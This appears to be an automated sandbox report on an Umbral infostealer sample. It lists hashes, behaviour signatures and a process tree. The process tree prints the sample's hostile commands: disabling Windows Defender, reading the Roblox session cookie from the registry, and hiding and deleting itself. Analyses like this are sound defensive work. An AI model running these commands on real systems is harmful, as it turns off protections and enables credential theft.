Analysis

  • max time kernel
    141s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-02-2024 18:27

General

  • Target

    test.exe

  • Size

    229KB

  • MD5

    4a1a7343912696cddb2f5e4fcb02a1c1

  • SHA1

    a7ed28d7dce1e93b349c9709690f2f03fc01a379

  • SHA256

    4baa876c24d03ddeb3484975bc7bcc90a498f26274d10a3ee499b5a1f8e5c749

  • SHA512

    355ce587a28634e7ebfe86f754693a1f04feb463db3439549022ec4601c154be4d19057a81b22c3b69ce68bf86839aae0d3c8e4af6297dffe2d04fa430a35850

  • SSDEEP

    6144:lloZM9rIkd8g+EtXHkv/iD45Pu6qoHjgv5sqb7ivrATb8e1mmi:noZOL+EP85Pu6qoHjgv5sqb7ivGE

Score
10/10

Malware Config

Signatures

  • Detect Umbral payload 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Drops file in Drivers directory 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\test.exe
    "C:\Users\Admin\AppData\Local\Temp\test.exe"
    1⤵
    • Drops file in Drivers directory
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4856
    • C:\Windows\SYSTEM32\attrib.exe
      "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\test.exe"
      2⤵
      • Views/modifies file attributes
      PID:3740
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\test.exe'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1472
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1820
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4956
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4932
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:4500
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2168
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      2⤵
        PID:3424
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:1704
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic" path win32_VideoController get name
        2⤵
        • Detects videocard installed
        PID:4132
      • C:\Windows\SYSTEM32\cmd.exe
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\test.exe" && pause
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1708
        • C:\Windows\system32\PING.EXE
          ping localhost
          3⤵
          • Runs ping.exe
          PID:2400

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      d85ba6ff808d9e5444a4b369f5bc2730

      SHA1

      31aa9d96590fff6981b315e0b391b575e4c0804a

      SHA256

      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

      SHA512

      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      a3870d8b2ce7ea7e013c1c8f1df60cfa

      SHA1

      afd24a7d2ce9789d3eb24e384013a88f476bd1d5

      SHA256

      d4ba5b6562063d637bf8ad5c1a505a71dac84742bc0d50e657c9f0bacb5de457

      SHA512

      6d4c836966d2a8d0c0d54b23496339afe89dd66892e75a6b405523424be4ac562d0b8f4513143734d939c719ff9fb94785665c7ca9614c216a130a0300ed9697

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      2979eabc783eaca50de7be23dd4eafcf

      SHA1

      d709ce5f3a06b7958a67e20870bfd95b83cad2ea

      SHA256

      006cca90e78fbb571532a83082ac6712721a34ea4b21f490058ffb3f521f4903

      SHA512

      92bc433990572d9427d0c93eef9bd1cc23fa00ed60dd0c9c983d87d3421e02ce3f156c6f88fe916ef6782dbf185cbce083bc0094f8c527f302be6a37d1c53aba

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      948B

      MD5

      985b3105d8889886d6fd953575c54e08

      SHA1

      0f9a041240a344d82bac0a180520e7982c15f3cd

      SHA256

      5178fdd457eb3eb25c8f72ed4c22c582a83de0d324db66d0446d660f226e944d

      SHA512

      0fd59bc4886b70aa3b7eeeaa23229b7fdc93410ca7f8452860e4a1bbda2559eaa5e4b05c3ec2d85f7d648daf3c16741f4c2c18f2dd3bae4cc4a4e57ae4f665b0

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      e0ec6bf376a6b15852bce768196c5ed0

      SHA1

      05fe4e592ebbb7e29f36b8d30a6a90ba29bd4f81

      SHA256

      2d4a39cbbd597a7cfff477817c3c7c541c14974c8d234b4c0de6d229e3a3ce97

      SHA512

      dc0c7d3d127c88affea9ae402d7358c079cfa7fc3ecb417085e31dc749da1406e72563bfbe42167fdad57e10aa0c6cca7a8ba06921b3a1212ad7ccee1a0f859b

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_x223tewf.oc0.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/1472-19-0x00007FF828C10000-0x00007FF8296D1000-memory.dmp

      Filesize

      10.8MB

    • memory/1472-11-0x000001BC32340000-0x000001BC32350000-memory.dmp

      Filesize

      64KB

    • memory/1472-16-0x000001BC32340000-0x000001BC32350000-memory.dmp

      Filesize

      64KB

    • memory/1472-10-0x000001BC32340000-0x000001BC32350000-memory.dmp

      Filesize

      64KB

    • memory/1472-3-0x00007FF828C10000-0x00007FF8296D1000-memory.dmp

      Filesize

      10.8MB

    • memory/1472-6-0x000001BC4AA10000-0x000001BC4AA32000-memory.dmp

      Filesize

      136KB

    • memory/1704-103-0x00007FF828C10000-0x00007FF8296D1000-memory.dmp

      Filesize

      10.8MB

    • memory/1704-96-0x0000019946290000-0x00000199462A0000-memory.dmp

      Filesize

      64KB

    • memory/1704-90-0x00007FF828C10000-0x00007FF8296D1000-memory.dmp

      Filesize

      10.8MB

    • memory/1820-21-0x00007FF828C10000-0x00007FF8296D1000-memory.dmp

      Filesize

      10.8MB

    • memory/1820-22-0x000001D6E4450000-0x000001D6E4460000-memory.dmp

      Filesize

      64KB

    • memory/1820-23-0x000001D6E4450000-0x000001D6E4460000-memory.dmp

      Filesize

      64KB

    • memory/1820-35-0x00007FF828C10000-0x00007FF8296D1000-memory.dmp

      Filesize

      10.8MB

    • memory/4856-43-0x00007FF828C10000-0x00007FF8296D1000-memory.dmp

      Filesize

      10.8MB

    • memory/4856-86-0x0000028C9B490000-0x0000028C9B49A000-memory.dmp

      Filesize

      40KB

    • memory/4856-108-0x00007FF828C10000-0x00007FF8296D1000-memory.dmp

      Filesize

      10.8MB

    • memory/4856-0-0x0000028C9AE60000-0x0000028C9AEA0000-memory.dmp

      Filesize

      256KB

    • memory/4856-40-0x0000028C9B460000-0x0000028C9B47E000-memory.dmp

      Filesize

      120KB

    • memory/4856-1-0x00007FF828C10000-0x00007FF8296D1000-memory.dmp

      Filesize

      10.8MB

    • memory/4856-38-0x0000028CB5630000-0x0000028CB56A6000-memory.dmp

      Filesize

      472KB

    • memory/4856-70-0x0000028CB53E0000-0x0000028CB53F0000-memory.dmp

      Filesize

      64KB

    • memory/4856-2-0x0000028CB53E0000-0x0000028CB53F0000-memory.dmp

      Filesize

      64KB

    • memory/4856-39-0x0000028CB5360000-0x0000028CB53B0000-memory.dmp

      Filesize

      320KB

    • memory/4856-87-0x0000028CB5330000-0x0000028CB5342000-memory.dmp

      Filesize

      72KB

    • memory/4932-81-0x00007FF828C10000-0x00007FF8296D1000-memory.dmp

      Filesize

      10.8MB

    • memory/4932-84-0x00007FF828C10000-0x00007FF8296D1000-memory.dmp

      Filesize

      10.8MB

    • memory/4932-82-0x00000263F4C20000-0x00000263F4C30000-memory.dmp

      Filesize

      64KB

    • memory/4956-42-0x00000131E3CF0000-0x00000131E3D00000-memory.dmp

      Filesize

      64KB

    • memory/4956-69-0x00007FF828C10000-0x00007FF8296D1000-memory.dmp

      Filesize

      10.8MB

    • memory/4956-59-0x00000131E3CF0000-0x00000131E3D00000-memory.dmp

      Filesize

      64KB

    • memory/4956-49-0x00000131E3CF0000-0x00000131E3D00000-memory.dmp

      Filesize

      64KB

    • memory/4956-41-0x00007FF828C10000-0x00007FF8296D1000-memory.dmp

      Filesize

      10.8MB